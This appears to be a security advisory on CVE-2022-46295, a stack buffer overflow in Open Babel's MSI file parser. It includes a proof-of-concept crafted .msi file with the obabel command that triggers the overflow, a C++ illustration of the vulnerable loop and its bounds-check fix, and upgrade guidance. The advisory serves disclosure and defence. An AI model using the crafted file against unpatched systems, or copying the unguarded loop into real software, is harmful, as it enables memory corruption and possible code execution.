Severity: high (CVSS 7.8) · CVE-2022-46295 · Jul 1, 2026

CVE-2022-46295: Open Babel MSI Parser Stack Buffer Overflow

Rohit Hatagale
AI Security Researcher, SecureLayer7

A crafted MSI chemistry file can overflow a fixed-size stack array in Open Babel's MSI parser, letting an attacker write arbitrary data past the end of the buffer and potentially execute code.

Package: openbabel
Ecosystem: pip
Affected: < 3.2.0
Fixed in: 3.2.0

The problem

Open Babel's MSI format reader in `msiformat.cpp` declares a fixed-size `translationVectors[]` array on the stack to hold unit-cell lattice vectors. The `ReadMolecule` loop reads lines after a `PeriodicType` keyword and writes a new vector entry for every line containing exactly 6 whitespace-separated tokens.

The loop has no upper-bound guard on `numTranslationVectors`. Supplying more 6-token lines than the array holds causes writes past the end of the stack buffer. Because the x, y, z values come directly from parsed tokens, the out-of-bounds write is attacker-controlled, which is what makes arbitrary code execution feasible (CVSS 7.8).

Proof of concept

The crafted file below triggers the overflow in affected versions of openbabel; the comment lines show how to feed it to `obabel`.

text
# Minimal crafted .msi file that overflows translationVectors[]
# Feed to: obabel -i msi evil.msi -o sdf
# Each "(A D A3 (x y z))" line after PeriodicType splits into exactly
# 6 whitespace-separated tokens -> one vector written.
# More than 3 such lines overflow the fixed stack array.

(1 Model
 (2 PeriodicType
  (A I OrderParameter 3)
 )
 (3 Lattice3D
  (A D A3 (1.0 0.0 0.0))
  (A D A3 (0.0 1.0 0.0))
  (A D A3 (0.0 0.0 1.0))
  (A D A3 (9.9 9.9 9.9))
  (A D A3 (8.8 8.8 8.8))
  (A D A3 (7.7 7.7 7.7))
 )
)

The vulnerable `while` loop in `MSIFormat::ReadMolecule` (msiformat.cpp) enters a branch on detecting `"PeriodicType"`, then reads subsequent lines and calls `translationVectors[numTranslationVectors++].Set(x, y, z)` for every line with 6 tokens, with no check that `numTranslationVectors` is still within the array bounds.

Because `Set()` writes three `double` values (24 bytes) per call, each extra iteration advances 24 bytes past the end of the stack-allocated array, overwriting whatever the compiler placed above it on the stack (other locals, saved registers and, further up, the return address) with attacker-supplied floating-point values. The patch (commit 40e85213) adds a bounds check so the loop stops writing as soon as `numTranslationVectors` reaches the array size.
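As an added illustration (this is not Open Babel's code and not part of the original advisory), the following stand-in reproduces the shape of the `PeriodicType` loop described above and in "The problem", with the bounds guard the fix adds. The array capacity of 3, the token positions of x, y, z, the stripping of parentheses from tokens, and the names `Vec3`, `ParseResult`, `Tokenize`, `NumberToken`, `ParseTranslationVectors`, `kOverflowingMsi` and `kBenignMsi` are all assumptions made for this example; the sample inputs are constructed from the proof-of-concept layout.

```cpp
#include <cstdlib>
#include <iostream>
#include <sstream>
#include <string>
#include <vector>

// Added example, not Open Babel's code. A minimal stand-in for the
// PeriodicType loop in MSIFormat::ReadMolecule, with the bounds guard the
// fix describes. Everything except the names translationVectors and
// numTranslationVectors (used in the advisory) is assumed for this example.

struct Vec3 {
  double x = 0, y = 0, z = 0;
  void Set(double a, double b, double c) { x = a; y = b; z = c; }
};

// Assumed capacity of the fixed-size stack array: the advisory only says that
// more than 3 vector lines overflow it.
constexpr int kMaxTranslationVectors = 3;

struct ParseResult {
  int written = 0;        // vectors stored in translationVectors[]
  bool overflow = false;  // a surplus 6-token line was seen; unguarded code
                          // would have written past the array here
  Vec3 translationVectors[kMaxTranslationVectors];
};

// Plain whitespace tokenizer (stands in for Open Babel's tokenize()).
static std::vector<std::string> Tokenize(const std::string& line) {
  std::vector<std::string> out;
  std::istringstream is(line);
  for (std::string tok; is >> tok;) out.push_back(tok);
  return out;
}

// atof on a token with surrounding parentheses removed, so "(1.0" and "0.0))"
// read as numbers (assumption about how the A3 line is laid out).
static double NumberToken(std::string tok) {
  while (!tok.empty() && tok.front() == '(') tok.erase(0, 1);
  while (!tok.empty() && tok.back() == ')') tok.pop_back();
  return std::atof(tok.c_str());
}

ParseResult ParseTranslationVectors(const std::string& text) {
  ParseResult r;
  int numTranslationVectors = 0;
  bool afterPeriodicType = false;
  std::istringstream in(text);
  std::string line;
  while (std::getline(in, line)) {
    if (!afterPeriodicType) {
      afterPeriodicType = line.find("PeriodicType") != std::string::npos;
      continue;
    }
    std::vector<std::string> vs = Tokenize(line);
    if (vs.size() != 6) continue;  // only 6-token lines carry a vector
    // Vulnerable form, as the advisory describes it (no guard):
    //   translationVectors[numTranslationVectors++].Set(x, y, z);
    // Guard added by the fix: stop as soon as the array is full.
    if (numTranslationVectors >= kMaxTranslationVectors) {
      r.overflow = true;
      break;
    }
    double x = NumberToken(vs[3]);
    double y = NumberToken(vs[4]);
    double z = NumberToken(vs[5]);
    r.translationVectors[numTranslationVectors++].Set(x, y, z);
    r.written = numTranslationVectors;
  }
  return r;
}

// Constructed input: six vector lines after PeriodicType, three more than the
// array holds. The unguarded loop would write 3 * 24 bytes past its end.
const char* kOverflowingMsi =
    "(1 Model\n"
    " (2 PeriodicType\n"
    "  (A I OrderParameter 3)\n"
    " )\n"
    " (3 Lattice3D\n"
    "  (A D A3 (1.0 0.0 0.0))\n"
    "  (A D A3 (0.0 1.0 0.0))\n"
    "  (A D A3 (0.0 0.0 1.0))\n"
    "  (A D A3 (9.9 9.9 9.9))\n"
    "  (A D A3 (8.8 8.8 8.8))\n"
    "  (A D A3 (7.7 7.7 7.7))\n"
    " )\n"
    ")\n";

// Constructed benign input: exactly three vectors.
const char* kBenignMsi =
    "(1 Model\n"
    " (2 PeriodicType\n"
    " )\n"
    " (3 Lattice3D\n"
    "  (A D A3 (2.5 0.0 0.0))\n"
    "  (A D A3 (0.0 2.5 0.0))\n"
    "  (A D A3 (0.0 0.0 2.5))\n"
    " )\n"
    ")\n";

int main() {
  ParseResult bad = ParseTranslationVectors(kOverflowingMsi);
  std::cout << "vectors stored: " << bad.written
            << ", overflow attempted: " << (bad.overflow ? "yes" : "no") << "\n";
  return bad.overflow ? 1 : 0;
}
```

Run against the overflowing input, the guarded loop stores three vectors and reports that a fourth write was attempted; the unguarded form in the comment would instead keep writing 24 bytes per surplus line past the array. The `overflow` flag is also a cheap way to reject such a file outright rather than silently truncating it.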

The fix

Upgrade to Open Babel 3.2.0 (released 2026-05-26), which contains commit 40e852138f21d586b7ccdce6329e7b23a87168bb. That commit adds an explicit upper-bound guard on `numTranslationVectors` before each write into `translationVectors[]`. There is no configuration workaround for older versions: until you have upgraded, do not parse untrusted MSI files with any Open Babel below 3.2.0, whether through the `obabel` command line or the pip package, which wraps the same native library.

Reported by Cisco Talos.

